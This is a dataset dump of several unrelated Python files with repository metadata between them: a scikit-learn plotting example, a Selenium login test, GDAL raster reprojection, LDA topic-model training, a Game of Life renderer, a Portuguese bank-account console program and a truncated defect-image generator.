import matplotlib.pyplot as plt
print(__doc__)
rng = np.random.RandomState(0)
n_samples = 5000
f_0 = rng.rand(n_samples) # positive correlation with y
f_1 = rng.rand(n_samples) # negative correlation with y
X = np.c_[f_0, f_1]
noise = rng.normal(loc=0.0, scale=0.01, size=n_samples)
y = (5 * f_0 + np.sin(10 * np.pi * f_0) -
5 * f_1 - np.cos(10 * np.pi * f_1) +
noise)
fig, ax = plt.subplots()
# Without any constraint
gbdt = HistGradientBoostingRegressor()
gbdt.fit(X, y)
disp = PartialDependenceDisplay.from_estimator(
gbdt,
X,
features=[0, 1],
line_kw={"linewidth": 4, "label": "unconstrained", "color": "tab:blue"},
ax=ax,
)
# With positive and negative constraints
gbdt = HistGradientBoostingRegressor(monotonic_cst=[1, -1])
gbdt.fit(X, y)
PartialDependenceDisplay.from_estimator(
gbdt,
X,
features=[0, 1],
feature_names=(
"First feature\nPositive constraint",
"Second feature\nNegtive constraint",
),
line_kw={"linewidth": 4, "label": "constrained", "color": "tab:orange"},
ax=disp.axes_,
)
for f_idx in (0, 1):
disp.axes_[0, f_idx].plot(
X[:, f_idx], y, "o", alpha=0.3, zorder=-1, color="tab:green"
)
disp.axes_[0, f_idx].set_ylim(-6, 6)
plt.legend()
fig.suptitle("Monotonic constraints illustration")
plt.show()
| [
"[email protected]"
] | |
fceff945861b4786665c029e26c74008e81d768d | 357a19924fb68d8c32bf77fbc201f61cedac6937 | /POM_UnitTest_HTMLReports_Framework_SDET/TestCase_Orange_hrm_login.py | 8425c7594f0988dcbd840e58386c3b03d7f096e2 | [] | no_license | Chi10ya/Selenium-with-Python | e2ecb0d3454f8e82bca0e89a38ddb5d6b3627533 | df0169cc75212157fc1314461d2d8c8dff36c500 | refs/heads/master | 2022-10-23T22:48:12.956801 | 2020-06-10T07:45:09 | 2020-06-10T07:45:09 | 256,746,070 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,414 | py | from selenium import webdriver
import unittest
from selenium.webdriver.common.by import By
import HtmlTestRunner
class OrangeHRMTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
chromeDriverPath = "C:\\Users\\chaitanya.mohammad\\PycharmProjects\\Python_Selenium_BrowserDrivers\\chromedriver.exe"
cls.driver=webdriver.Chrome(executable_path=chromeDriverPath)
cls.driver.maximize_window()
def test_homePageTitle(self):
demoAppURL = "https://opensource-demo.orangehrmlive.com"
self.driver.get(demoAppURL)
self.assertEqual("OrangeHRM", self.driver.title, "webpage title is not matching")
def test_login(self):
demoAppURL = "https://opensource-demo.orangehrmlive.com"
self.driver.get(demoAppURL)
self.driver.find_element(By.NAME, "txtUsername").send_keys("Admin")
self.driver.find_element(By.NAME, "txtPassword").send_keys("admin123")
self.driver.find_element(By.NAME, "Submit").click()
self.assertEqual("OrangeHRM", self.driver.title, "webpage title is not matching")
@classmethod
def tearDownClass(cls):
cls.driver.quit()
print("Test Completed")
if __name__ == '__main__':
unittest.main(testRunner=HtmlTestRunner.HTMLTestRunner(output='C:\\Users\\chaitanya.mohammad\\PycharmProjects\\SDET_SeleniumWithPython\\POM_UntiTest_HTMLReports_Framework-SDET\\Reports')) | [
"[email protected]"
] | |
f357352e2b4139eaa7e6bef581fb10ea734d9cf2 | fa07722e4f803c42ee57a7a7fd511d95bad079e4 | /r_rprj_mt.py | 003d4a629edbb8fe793b0370f8000e6157f3ca9f | [
"MIT"
] | permissive | Ivanych999/gispython | 48207c50c3101383dec41a4ae2a90805ec51a7f3 | f15842ea502f235afbda638ce2769a0057c97eea | refs/heads/master | 2021-01-18T07:21:40.112534 | 2015-10-29T14:38:37 | 2015-10-29T14:38:37 | 44,006,578 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,155 | py | # -*- coding: utf-8 -*-
__author__ = '[email protected]'
import os,sys,datetime,argparse,threading,time,shutil
from osgeo import gdal
from gdalconst import *
from Queue import Queue
queue = Queue()
LOCK = threading.RLock()
# CONSTs
folders = {
0.5: '0_5', # subfolder for raster with 0.5 pixel size
1.0: '1_0', # subfolder for raster with 1.0 pixel size
1.5: '1_5', # subfolder for raster with 1.5 pixel size
2.0: '2_0', # subfolder for raster with 2.0 pixel size
2.5: '2_5' # subfolder for raster with 2.5 pixel size
}
# severity: 0 - Info, 1 - Warning, 2 - Error
def AddMessage(severity,message):
sd = {0: 'Info', 1: 'Warning', 2: 'Error'}
print "{0} at {1}: {2}".format(sd[severity],datetime.datetime.now().strftime('%d.%m.%Y %H:%M:%S'),message)
def ParseArgs():
ap = argparse.ArgumentParser(description='Reproject rasters and build pyramids')
ap.add_argument('--in-folder', '-i', type=str, action='store', required=True, help='Root folder for scaning GeoTIFF files')
ap.add_argument('--tmp-folder', '-t', type=str, action='store', required=False, help='Temp folder')
ap.add_argument('--out-folder', '-o', type=str, action='store', required=True, help='CSV file name')
ap.add_argument('--epsg', '-e', type=int, action='store', default=3857, required=True, help='Target EPSG')
ap.add_argument('--threding-count', '-c', type=int, action='store', default=24, required=True, help='Threading count')
ap.add_argument('--replace', '-r', action='store_true', default=False, help='Replace output')
ap.add_argument('--build', '-b', action='store_true', default=False, help='Build pyramids')
args = ap.parse_args()
args_dict = vars(args)
return vars(args)
def BuildPyramids(rst):
try:
if os.path.exists(rst):
if os.path.exists(rst+'.ovr'):
os.remove(rst+'.ovr')
return os.system('gdaladdo -ro "%s" 2 4 8 16 32' % rst)
except Exception,err:
return u'Error: %s' % unicode(err)
def Reproject(i_rst, o_rst, t_epsg):
try:
if os.path.exists(i_rst):
if os.path.exists(o_rst):
os.remove(o_rst)
return os.system('gdalwarp -t_srs EPSG:%s "%s" "%s"' % (t_epsg,i_rst,o_rst))
except Exception,err:
return u'Error: %s' % unicode(err)
def SaveStatFirstLine(csv, use_temp = True):
csvf = open(csv,'w')
if use_temp:
csvf.write('"src_file";"result";"dst_folder";"dst_file";"dst_file_size";"reproject_time";"pyramids_time";"pyramids_size";"moving_time"\n')
else:
csvf.write('"src_file";"result";"dst_folder";"dst_file";"dst_file_size";"reproject_time";"pyramids_time";"pyramids_size"\n')
csvf.close()
def SaveStatLine(csv, line, use_temp = True):
global LOCK
LOCK.acquire()
csvf = open(csv,'a')
if use_temp:
csvf.write('"{0}";"{1}";"{2}";"{3}";{4};"{5}";"{6}";{7};"{8}"\n'.format(line.get('src_file',''),line.get('result',''),line.get('dst_folder',''),line.get('dst_file',''),line.get('dst_file_size',0),line.get('reproject_time',''),line.get('pyramids_time',''),line.get('pyramids_size',0),line.get('moving_time','')))
else:
csvf.write('"{0}";"{1}";"{2}";"{3}";{4};"{5}";"{6}";{7}\n'.format(line.get('src_file',''),line.get('result',''),line.get('dst_folder',''),line.get('dst_file',''),line.get('dst_file_size',0),line.get('reproject_time',''),line.get('pyramids_time',''),line.get('pyramids_size',0)))
csvf.close()
LOCK.release()
def doWork():
global queue
global use_temp
while True:
# Try get task from queue
try:
c_task = queue.get_nowait()
except:
return
# Initialize stat dict
stat_line = {}
# Set start stat parameters
stat_line['src_file'] = c_task['in_file']
stat_line['result'] = 'success'
stat_line['dst_folder'] = c_task['out_folder']
stat_line['dst_file'] = os.path.basename(c_task['in_file'])
AddMessage(0,'Processes with %s' % c_task['in_file'])
try:
tmp_name = os.path.join(c_task['out_folder'],stat_line['dst_file'])
if use_temp:
tmp_name = os.path.join(c_task['tmp_folder'],stat_line['dst_file'])
# Start reproject
p_start_time = datetime.datetime.now()
Reproject(c_task['in_file'],tmp_name,c_task['epsg'])
stat_line['dst_file_size'] = os.path.getsize(tmp_name)
stat_line['reproject_time'] = '%s' % (datetime.datetime.now()-p_start_time)
if c_task['build']:
# Start build pyramids
pm_start_time = datetime.datetime.now()
BuildPyramids(tmp_name)
stat_line['pyramids_size'] = os.path.getsize(tmp_name+'.ovr')
stat_line['pyramids_time'] = '%s' % (datetime.datetime.now()-pm_start_time)
if use_temp:
# Start moving results
mv_start_time = datetime.datetime.now()
out_name = os.path.join(c_task['out_folder'],stat_line['dst_file'])
shutil.move(tmp_name,out_name)
if c_task['build']:
shutil.move(tmp_name+'.ovr',out_name+'.ovr')
stat_line['moving_time'] = '%s' % (datetime.datetime.now()-mv_start_time)
except Exception,err:
AddMessage(2,'Cannot process file %s' % c_task['in_file'])
stat_line['result'] = 'error'
stat_line['dst_folder'] = err
SaveStatLine(c_task['stat_file'],stat_line,use_temp)
def main():
global queue
global use_temp
# Parsing input args
args = ParseArgs()
# Check input folder
if os.path.exists(args['in_folder']):
# Check output folder
if not os.path.exists(args['out_folder']):
try:
os.mkdir(args['out_folder'])
AddMessage(0,'Folder %s created' % args['out_folder'])
except Exception,err:
AddMessage(2,'Cannot create output folder %s: %s' % (args['out_folder'],err))
return
# Set use temp
use_temp = False
if args.get('tmp_folder',None):
use_temp = True
# Check temp folder
if use_temp:
if not os.path.exists(args['tmp_folder']):
try:
os.mkdir(args['tmp_folder'])
AddMessage(0,'Folder %s created' % args['tmp_folder'])
except Exception,err:
AddMessage(2,'Cannot create temp folder %s: %s' % (args['tmp_folder'],err))
return
AddMessage(0,'Start scan %s' % args['in_folder'])
# Create statistic file
csv = os.path.join(args['out_folder'],'statistic.csv')
if use_temp:
csv = os.path.join(args['tmp_folder'],'statistic.csv')
SaveStatFirstLine(csv,use_temp)
# Start scan folders tree and making queue
for root,dir,files in os.walk(args['in_folder']):
AddMessage(0,'Current dir is %s' % root)
for f in files:
if f.rpartition('.')[2].lower() == 'tif':
f_task = {}
f_task['in_file'] = os.path.join(root,f)
f_task['tmp_folder'] = args.get('tmp_folder',None)
f_task['build'] = args['build']
f_task['stat_file'] = csv
f_task['epsg'] = args['epsg']
f_task['replace'] = args['replace']
AddMessage(0,'Processes with %s ' % f)
try:
ro = gdal.Open(f_task['in_file'], GA_ReadOnly)
if ro:
f_task['out_folder'] = os.path.join(args['out_folder'],folders[ro.GetGeoTransform()[1]])
ro = None
# Check output folder
if not os.path.exists(f_task['out_folder']):
try:
os.mkdir(f_task['out_folder'])
AddMessage(0,'Folder %s created' % f_task['out_folder'])
except Exception,err:
AddMessage(2,'Cannot create output folder %s: %s' % (args['out_folder'],err))
continue
if os.path.exists(os.path.join(f_task['out_folder'],f)):
if args['replace']:
AddMessage(1,'Start removing output file %s' % f)
os.remove(os.path.join(f_task['out_folder'],f))
if os.path.exists(os.path.join(f_task['out_folder'],f)+'.ovr'):
os.remove(os.path.join(f_task['out_folder'],f)+'.ovr')
AddMessage(0,'Output file %s removed' % f)
queue.put(f_task)
AddMessage(0,'File %s put into queue' % f)
else:
queue.put(f_task)
AddMessage(0,'File %s put into queue' % f)
else:
AddMessage(1,'Error while opening file %s' % f)
except:
AddMessage(1,'Error while opening file %s' % f)
AddMessage(0,'Scaning completed')
AddMessage(0,'Start work with tasks')
for _ in xrange(args['threding_count']):
thread_ = threading.Thread(target=doWork)
thread_.start()
while threading.active_count() > 1:
time.sleep(1)
AddMessage(0,'All tasks completed')
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
0192dd21e181ec805541dd1f7348647918833069 | 61f8caa755c5f77984f0513ca60392a889154495 | /src/Tfit_param_histograms.py | bb43bae7ce465d1f4af41cd0c6d9ca2a89f3c7f2 | [] | no_license | jdrubin91/GROAnalysis | 1f45aaf9185fd574b64c56f855dfaa7202625157 | fb692c3d9975f003d51929f4a07f466f43b7feaf | refs/heads/master | 2021-01-10T08:59:05.207471 | 2017-12-12T17:54:13 | 2017-12-12T17:54:13 | 49,988,869 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,262 | py | __author__ = 'Jonathan Rubin'
import os
import sys
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib import rcParams
rcParams.update({'figure.autolayout': True})
from scipy.stats import gaussian_kde
from scipy.stats import norm
import numpy as np
import math
#Return parent directory
def parent_dir(directory):
pathlist = directory.split('/')
newdir = '/'.join(pathlist[0:len(pathlist)-1])
return newdir
#Home directory
homedir = os.path.dirname(os.path.realpath(__file__))
#File directory
filedir = parent_dir(homedir) + '/files'
#Figure directory
figuredir = parent_dir(homedir) + '/figures/'
def run(folder):
names = ['mu_k', 'sigma_k', 'lambda_k', 'pi_k', 'fp_k', 'w_[p,k]', 'w_[f,k]', 'w_[r,k]', 'b_[f,k]', 'a_[r,k]']
values = [[] for i in range(len(names))]
for file1 in os.listdir(folder):
if 'K_models_MLE.tsv' in file1:
print file1
with open(folder + file1) as F:
for line in F:
if '#' not in line[0]:
if '>' in line[0]:
i = 0
if i == 2:
line = line.strip().split()[1:]
w = line[5].split(',')
for k in range(len(line)):
if k == 5:
for l in range(len(w)):
values[k+l].append(float(w[l]))
elif k > 5:
values[k+2].append(float(line[k]))
else:
values[k].append(float(line[k]))
i+=1
length = len(names)
F = plt.figure()
F.suptitle(file1, fontsize=14)
for i in range(length):
ax = F.add_subplot(2,5,i)
plt.hist(values[i],bins=100)
ax.set_title(names[i])
plt.savefig(figuredir + file1 + '.png')
if __name__ == "__main__":
folder = '/projects/dowellLab/Taatjes/170207_K00262_0069_AHHMHVBBXX/cat/trimmed/flipped/bowtie2/sortedbam/genomecoveragebed/fortdf/'
run(folder) | [
"[email protected]"
] | |
81918093546a7302b6a193c07d3dbc4b5974fd75 | 61487f888f6d4383a2f357c53aabf298df0d9343 | /golImage.py | 1d80f69a4c7767e882db4e602f27d0fb35606e6b | [
"MIT"
] | permissive | dwoiwode/Game-Of-Life-Media-Renderer | b44475b4cf417aba648a457929db7fa04dbf8d3b | 05ad2eb52a4c5cc4f7e2e92adc0820c1b616beba | refs/heads/master | 2021-06-24T19:02:19.155725 | 2020-12-28T22:14:00 | 2020-12-28T22:14:00 | 195,087,864 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,520 | py | import os
import random
from pathlib import Path
import cv2
from tqdm import tqdm
import utils.colormaps as cm
from gol import GoL
from imageRenderer import RenderSettings, renderImage
class GoLImageRenderer:
def __init__(self, folder, width, height, fpg=1, showNeighbourCount=False, showGridlines=False,
colormap=None, renderer=None):
self.folder = folder
# Rendersettings
self.renderer = renderer if renderer is not None else renderImage
self.renderSettings = RenderSettings(width, height)
self.renderSettings.colormap = colormap
self.renderSettings.showNeighbours = showNeighbourCount
self.renderSettings.showGridlines = showGridlines
self.renderSettings.onColorIndex = 255
self.renderSettings.offColorIndex = 0
# Videosettings
self.fpg = fpg
os.makedirs(Path(folder), exist_ok=True)
self.oldImage = None
def appendGoL(self, gol: GoL, maxGenerations=100,
tl=(0, 0), br=(-1, -1), preview=False, abortCondition=None, onColorChange=0, offColorChange=0,
**kwargs):
minTL, maxTL = tl
minBR, maxBR = br
try:
_, _ = minTL
except TypeError:
minTL = maxTL = tl
try:
_, _ = minBR
except TypeError:
minBR = maxBR = br
maxGenerations += 1
progressRange = tqdm(range(maxGenerations))
for i in progressRange:
for frameNo in range(self.fpg):
curTL = [min_tl + (max_tl - min_tl) / (maxGenerations * self.fpg) * ((i - 1) * self.fpg + frameNo) for
min_tl, max_tl in zip(minTL, maxTL)]
curBR = [min_br + (max_br - min_br) / (maxGenerations * self.fpg) * ((i - 1) * self.fpg + frameNo) for
min_br, max_br in zip(minBR, maxBR)]
self.renderSettings.topLeft = curTL
self.renderSettings.bottomRight = curBR
img = self.renderer(gol, self.renderSettings)
if preview:
cv2.imshow(self.folder, img)
cv2.setWindowTitle(self.folder, f"{self.folder} - {i} ({frameNo}/{self.fpg})")
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cv2.imwrite(str(Path(self.folder)) + f"/{gol.name}_{gol.generation}_{frameNo:02d}.jpg", img)
gol.step()
if abortCondition is not None and abortCondition(gol):
progressRange.close()
return
changeOnColor = (0.5 - random.random()) * 2 * onColorChange
changeOffColor = (0.5 - random.random()) * 2 * offColorChange
self.renderSettings.onColorIndex = min(max(self.renderSettings.onColorIndex + changeOnColor, 128), 255)
self.renderSettings.offColorIndex = min(max(self.renderSettings.offColorIndex + changeOffColor, 0), 128)
def addHighlight(self, position, color, size):
if isinstance(color, str):
color = cm._htmlColor(color)
self.renderSettings.highlights.append((position, color, size))
def addText(self, position, text, color):
if isinstance(color, str):
color = cm._htmlColor(color)
self.renderSettings.texts.append((position, text, color))
def renderImage(self, gol: GoL):
if not isinstance(gol, GoL):
gol = GoL(gol)
return self.renderer(gol, self.renderSettings)
| [
"[email protected]"
] | |
f387437c4d43d4be308abb9110efec9f3d4d303c | a550d4097c993601d4159f03bc148f19b721c530 | /train_lda.py | ba20227a90a90b297c2ba6a490112f99796fa780 | [] | no_license | nitinhardeniya/hackpredict | 35ccea4934c010c28aed0cbf488c212c66895096 | a4f2c20cee811aedc90e476580a77c51c6e02979 | refs/heads/master | 2020-05-30T03:11:37.150740 | 2015-04-11T13:35:54 | 2015-04-11T13:35:54 | 33,776,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,297 | py |
#########################################################################################
#: The main utill to train the LDA using gensim
# more info http://radimrehurek.com/gensim/
#: Author :Nitin Hardeniya
#########################################################################################
import sys
import logging
import os
import numpy
from gensim import corpora, models, similarities
from threading import Thread
from readutils import readreviews
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', filename="logs_training.txt", level=logging.INFO)
# define a Handler which writes INFO messages or higher to the sys.stderr
console = logging.StreamHandler()
console.setLevel(logging.INFO)
# set a format which is simpler for console use
formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')
# tell the handler to use this format
console.setFormatter(formatter)
# add the handler to the root logger
logging.getLogger('').addHandler(console)
def trainLda(docs,numTopics,reports_dir, dictoutfile="dictionary.txt", modeloutfile="model.txt"):
'''
Trains an lda on the list of documents.
docs: a list of document words {list of list of words}
numTopics: number of topics of the lda to be trained
dictoutfile: output file where dictionary is saved
modeloutfile: output file where trained model is saved
perplexity.txt : To evaluate the topics model for different no of topics
'''
print docs
#print len(docs)
perplexity=open(os.path.join(reports_dir,'_perplexity.txt'),'a')
topicsTopwordsfile=open(os.path.join(reports_dir,'_'+str(numTopics)+'.txt'),'w')
topicswordsfile=open(os.path.join(reports_dir,'_'+str(numTopics)+'allwords.txt'),'w')
dictionary = corpora.Dictionary(docs)
corpus = [dictionary.doc2bow(doc) for doc in docs]
tfidf =models.TfidfModel(corpus)
# tfidf convert
corpus_tfidf = tfidf[corpus]
#print corpus
#passes=50
logging.info("Starting model training")
model = models.ldamodel.LdaModel(corpus_tfidf, id2word=dictionary, num_topics=numTopics)
model.print_topics(50)
for i in range(0, model.num_topics):
word=model.print_topic(i)
topicsTopwordsfile.write("topic"+str(i)+'-'*100+'\n')
topicsTopwordsfile.write(word+'\n')
# saving perplexity and other for the model selection
perplex = model.bound(corpus)
#@to-do
#Per_word_Perplexity=numpy.exp2(-perplex / sum(cnt for document in corpus for cnt in document))
perplexity.write("Topics :"+str(numTopics)+'\t'+str(perplex)+'\n')
#perplexity.write("Per-word Perplexity :"+str(numTopics)+'\t'+str(Per_word_Perplexity)+'\n')
logging.info("Done model training")
# Save the model
dictionary.save(dictoutfile)
model.save(modeloutfile)
def training():
''' Wrote a batch fuction that will call trainLDA for different ranges
start=(int) :start in the range of topics we want to try
end=(int) : end in the range of topics we want to try
step =(int) :stepsize in the range of topics we want to try
'''
if(not os.path.exists(outdir)): os.mkdir(outdir)
reports_dir=os.path.join(outdir, 'reports'+PDS)
if(not os.path.exists(reports_dir)):os.mkdir(reports_dir)
docs = readreviews(dealfile)
def main():
#training()
#parsereviews(sys.argv[1],sys.argv[2])
return
if(__name__ == "__main__"):
main()
| [
"[email protected]"
] | |
f3cf5e33ee6238e6931cf49d8df1824ab21d1b81 | 8dc1f6120dbc06fc4ceddba50c63bc8fc0057366 | /TrabalhoFinal.py | 256b5dc0f8fcbf50cc6d18b53e5855aed430ee69 | [] | no_license | tedescovinicius/Trabalho-final-Disciplina-de-Algoritmos | d314e31e96eb2511afe84cd737e7e29982340f18 | 654d87d5105a6f0c7f1b285d3966fe3f9b2a622f | refs/heads/master | 2022-09-11T15:57:17.569437 | 2019-12-16T15:16:23 | 2019-12-16T15:16:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,540 | py | import os
def clear(): #Importação biblioteca para limpeza de tela
os.system('cls' if os.name == 'nt' else 'echo -e \\\\033c')
class cadastro: # Classe cadastro para tipos de dados
nome=''
sobrenome=''
cpf=''
email=''
endereco=''
telefone=0
nconta=0
lcredito= 1000
saldo= 0.0
def dados (l): # Função dados, cadastrar cliente
p1=cadastro()
p1.nome=input('Nome:')
p1.sobrenome=input('Sobrenome:')
p1.cpf=int(input('CPF:'))
p1.email=input('Email:')
p1.endereco=input('Endereço:')
p1.telefone=input('Telefone:')
p1.nconta=input('Numero da conta:')
p1.lcredito= 1000.00
p1.saldo=float(input('Saldo da conta:'))
if (len(l) !=0): # se o tamanho da lista l for diferente de 0
for i in range (len(l)): # Percorre a lista l
if (l[i].cpf == p1.cpf): # Se o cpf na lista l é igual cpf digitado, cpf ja cadastrado
clear() #Limpa tela
print (' Cpf já cadastrado')
return
if (l[i].nconta == p1.nconta): #Se a conta na lista l é igual a conta digitada, conta já digitada
print ('Conta existente:')
print ('Informe uma nova conta:')
p1.nconta=int(input('>'))
l.append(p1) #Adiciona no elemento p1
if (p1 !=''):
print ('Cadastro realizado com sucesso')
def menu (): # Função com as opções para o usuário
print()
print ('Digite abaixo a opção que desejar !')
print()
print('1 - Inserir cliente:')
print('2 - Alterar dados de um clientes:')
print('3 - Excluir cliente:')
print('4 - Listar clientes:')
print('5 - Movimento da conta:')
print('6 - Sair')
print ()
x=int(input('Digite a opção:'))
clear() #Limpa tela
return x
def menu2 (): #Função realizar novamente operação, ou voltar no menu geral.
print('Digite a opção:')
print('1 - Para realizar novamente a operação')
print('0 - Para voltar ao menu anterior')
print('Digite a operação que deseja realizar')
y = int(input('>'))
clear() #Limpa tela
return y
def menubusca(): # Função para buscar
print('Digite a opção de filtro desejado')
print('1 - Nome')
print('2 - Sobrenome')
print('3 - CPF')
print('4 - E-mail')
print('5 - Endereço')
print('6 - Telefone')
print('7 - Numero da conta')
print('8 - Limite de credito')
print('9 - Saldo')
bc = int(input('Digite a opção:'))
if(bc == 1):
bc='nome'
if(bc==2):
bc='sobrenome'
if(bc==3):
bc='cpf'
if(bc==4):
bc='email'
if(bc==5):
bc='endereco'
if(bc==6):
bc='telefone'
if(bc==7):
bc='Numero'
if(bc==8):
bc='Limite'
if(bc==9):
bc='saldo'
print('O valor do bc dentro da função é', bc)
return bc
def listcad(l): # Função para listar clientes
print('1 - Para listar todos os cadastros')
print('2 - Para buscar cadastro especifico')
print('Digite a opção desejada')
op = int(input('-->'))
clear()
if(op == 1): # Se digitar 1, lista todos clientes cadastrados
for i in range(len(l)): # Percorre a lista l
print('Nome: ', l[i].nome) #Acessa o nome na lista l
print('Sobre nome: ',l[i].sobrenome)
print('CPF: ',l[i].cpf)
print('E-mail: ',l[i].email)
print('Endereço: ',l[i].endereco)
print('Telefone: ',l[i].telefone)
print('Conta: ',l[i].nconta)
print('Limite: ',l[i].lcredito)
print('Saldo: ',l[i].saldo)
print('------------------------------//----------------------------------')
print()
else: # Se digitar 2, cadastro especifico de um cliente
print('Digite o CPF que deseja consultar')
value = int(input('-->'))
for i in range(len(l)): # Percorre a lista l
if(l[i].cpf == value): #Se o cpf na lista l é igual ao cpf digitada, ok
print('Nome: ', l[i].nome)
print('Sobre nome: ',l[i].sobrenome)
print('CPF: ',l[i].cpf)
print('E-mail: ',l[i].email)
print('Endereço: ',l[i].endereco)
print('Telefone: ',l[i].telefone)
print('Conta: ',l[i].nconta)
print('Limite: ',l[i].lcredito)
print('Saldo: ',l[i].saldo)
else:
print('Registro não encontrado')
def dadosaltera (l): # Função para alterar dados cliente
value = int(input('Digite o CPF que deseja fazer alterações:'))
for i in range(len(l)): # Percorre a lista l
if(l[i].cpf == value): #Se o cpf na lista l é igual ao cpf digitada, ok
p1=cadastro()
p1.nome=input('Nome:')
p1.sobrenome=input('Sobrenome:')
p1.cpf=int(input('CPF:'))
p1.email = input('E-mail:')
p1.endereco = input('Endereço:')
p1.telefone = int(input('Telefone:'))
p1.nconta=input('Numero da conta:')
p1.limite = float(input('Limite de credito aprovado:'))
p1.saldo = float(input('Seu saldo em conta:'))
l[i] = (p1)
if(p1!=''):
print('Dados alterados com sucesso')
def excluiclientes(l): #Função para excluir clientes
value = int(input('Digite o CPF que deseja excluir:'))
for i in range(len(l)): # Percorre a lista l
if(l[i].cpf == value): #Se o cpf na lista l é igual ao cpf digitada, ok
p1 = i
print('1 - Confirmar a exclução dos dados do CPF.',l[p1].nome)
print('0 - Para cancelar a operação')
r = int(input('>'))
if(r == 1):
del(l[p1]) #Deleta cliente
def movimentaconta(l): #Função para realizar movimentos na conta
print('Movimentações')
print('1 - Realizar debito')
print('2 - Realizar credito')
op=int(input('Digite a opção:'))
if(op == 1): #Se op = 1, operação débito
print('Operação de debito')
c=int(input('Digite o CPF para fazer o debito:'))
clear() #Limpa tela
for i in range(len(l)): # Percorre a lista l
if(l[i].cpf == c): # Se o cpf digitado no inicio, for igual ao cpf digitado agora, ok
print('Digite o valor que deseja debitar')
val = float(input('-->'))
if(l[i].saldo >= val): #Se o saldo na lista l é maior ou igual ao val digitada, ok
l[i].saldo -= val # Saldo na lista l - o val digitado. Conta saldo atual
print('Seu saldo atual é de ',round(l[i].saldo))
print('Seu limite de credito é de ',round(l[i].lcredito, 2))
elif(l[i].saldo >= 0): #Se o saldo na lista l é menor ou igual a 0, ok
l[i].saldo -= val # Saldo na lista l - val digitado
l[i].saldo *=-1
if(l[i].saldo <= l[i].lcredito): # Se o saldo na lista l for menor ou igual a credito na lista l, ok
print('Seu saldo esta abaixo do valor informado para debito')
print('O valor de ',round(l[i].saldo, 2) ,'esta sendo debitado do seu limite de credito')
l[i].lcredito -= l[i].saldo
l[i].saldo = 0.00
print('Seu saldo atual é de R$ ',l[i].saldo)
print('Seu limite de credito é de R$ ',round(l[i].lcredito, 2))
else:
clear()
print('operação não foi realizada')
print('Seu saldo + limite esta abaixo do valor informado para debito')
else:
print('CPF informado não foi localizado no sistema')
if(op == 2): # Se op = 2, operção crédito
print('Credito')
c = int(input('Digite o CPF que deseja realizar a operação:'))
for i in range(len(l)): # Percorre a lista l
if(l[i].cpf == c): # Se o cpf digitado no inicio, for igual ao cpf digitado agora, ok
print('Digite o valor que deseja depositar')
val = float(input('-->'))
if(l[i].lcredito == 1000): # Se o lcredito na lista l for = 1000,ok
l[i].saldo += val # Saldo na lista l + val digitado
print('Deposito realizado com sucesso')
print('Seu saldo atual é de R$ ',round(l[i].saldo, 2))
print('Seu limite de credito é de R$ ',round(l[i].lcredito, 2))
elif(l[i].lcredito < 1000 and l[i].lcredito > 0): # Percorre lcredito na lista l, tendo valor menor que 1000 e maior que 0, ok
l[i].lcredito += val # Credito na lista l + val digitado
if(l[i].lcredito > 1000): #Se o lcredito na lista l for maior que 1000, ok
val = l[i].lcredito - 1000 # lcredito na lista l - 1000
l[i].lcredito -= val # lcredito na lista l - val digitado
l[i].saldo += val # Saldo na lista l + val digitado
print('Deposito realizado com sucesso')
print('Seu saldo atual é de R$ ',round(l[i].saldo, 2))
print('Seu limite de credito é de R$ ',round(l[i].lcredito, 2))
else:
print('Deposito realizado com sucesso')
print('Seu saldo atual é de R$ ',round(l[i].saldo, 2))
print('Seu limite de credito é de R$ ',round(l[i].lcredito, 2))
else:
print('Operação não realizada, tente novamente mais trade')
else:
print('CPF informado não foi localizado no sistema')
if(op !=1 and op !=2): #Se op !=1 e !=2, operacão finalizada
print('operação não localizada')
#Condições do acesso menu principal!
i=1
while(i > 0):
clear()
l = []
opcao=1
while(opcao != 6): #Se digitar 6, sai do programa
opcao = menu()
subMenu = 1
if(opcao == 1): #Se digitar 1, vai para inserir dados
while(subMenu == 1):
dados(l) #Cadastrar clientes
subMenu = menu()
if(opcao == 2): #Se digitar 2, vai para alterar dados clientes
while(subMenu == 1):
dadosaltera(l) #Alterar dados clientes
subMenu = menu2()
if(opcao == 3): #Se digitar 3, vai para deletar dados clientes
while(subMenu == 1):
excluiclientes(l) #Excluir clientes
subMenu = menu2()
if(opcao == 4): #Se digitar 4, vai para listar clientes
while(subMenu == 1):
listcad(l)# Listar clientes
subMenu = menu2()
if(opcao == 5): #Se digitar 5, vai para movimentar conta
while(subMenu == 1):
movimentaconta(l) #Movimentar conta
subMenu = menu2()
else: # Se caso não digitou nenhum dos números a cima, tentativa invalida
i -=1
print('Credenciais invalidas, você possui mais',i, 'tentativa(s)')
| [
"[email protected]"
] | |
e5b816a271981e5e88da96fe714366af82c5840e | bf64d19174ef332f39e2d8210f3eb4f783262554 | /lib/generate_defect/zlrm_Generate_the_defects_data.py | 75ffb5c6ed53c7e27cde20f4b9f75e40f2a2ca73 | [] | no_license | juzisedefeimao/cv | 3e4dd7deee471321e071ca996769fc3b65481993 | fb9e9292030481f5a26efde4003fb83d37a34962 | refs/heads/master | 2020-05-30T14:29:13.253563 | 2019-06-02T01:08:53 | 2019-06-02T01:08:53 | 189,791,743 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32,276 | py | from PIL import Image
import numpy as np
from time import strftime
import os
import xml.etree.ElementTree as ET
class Generate_Defect():
def __init__(self, save_image_root=None, save_label_root=None, read_label_root=None,
read_defect_root=None, save_fail_label_root=None, save_fail_image_root=None):
self.save_image_root = save_image_root
self.save_label_root = save_label_root
self.read_label_root = read_label_root
self.read_defect_root = read_defect_root
self.fail_label_root = save_fail_label_root
self.fail_image_root = save_fail_image_root
self.scale_random = False
self.ratio_random = False
self.rotate_random = False
self.painting_random = False
self.translation_random = True
# 变换后的相应缺陷图片
self.defect_image_list = []
self.defect_scale_image_list = []
self.defect_ratio_image_list = []
self.defect_rotate_image_list = []
